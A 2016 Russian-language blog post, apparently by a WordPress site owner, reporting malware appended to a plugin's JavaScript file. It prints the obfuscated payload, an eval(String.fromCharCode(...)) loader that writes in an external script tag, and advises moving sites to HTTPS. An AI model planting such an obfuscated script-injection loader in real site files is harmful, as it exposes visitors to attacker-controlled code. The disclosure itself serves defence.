Этот рекламный блок выводится с помощью сервиса AdPlus.io

Очередной вирус


В очередной раз обнаружил на сайте вирус, связанный с доменом http://o0e.ru/.

В файл плагина Q2W3 Fixed Widget в файле /wp-content/plugins/q2w3-fixed-widget/js/q2w3-fixed-widget.min.js в конце был дописан код:

eval(String.fromCharCode(100, 111, 99, 117, 109, 101, 110, 116, 46, 119, 114, 105, 116, 101, 40, 34, 60, 115, 99, 114, 34, 43, 34, 105, 112, 116, 32, 115, 114, 99, 61, 47, 34, 43, 34, 47, 118, 34, 43, 34, 107, 46, 99, 34, 43, 34, 99, 62, 34, 41))

Часть кода я изменил, так как

Сервис virusdie.ru его не распознавал.

Самое главное в этом то, что обнаружил этот вирус после того, как перевел сайт на https, браузер помечал сайт как незащищенный и выдал скрипты, которые подгружаются не через https.

Вывод: переводим потихоньку сайты на https.


20 Сен, 2016

4 комментария

  • seoonly.ru

    20 сентября 2016

    Руки поотрывать тем, кто заражает((

    Reply
  • Иван

    22 сентября 2016

    У меня версия плагина 5.0.3. Таких строчек кода в плагине не обнаружил

    Reply
    • Archil

      22 сентября 2016

      Да, дело не в самом плагине, туда вшили этот код. Я вот никак не могу определить как оно туда попадает.

      Reply
  • Александр

    4 февраля 2017

    Ещё вирусов не хватал на свой сайт, но тема очень актуальная. Возьму этот сервис себе на вооружение. 🙂

    Reply

Добавить комментарий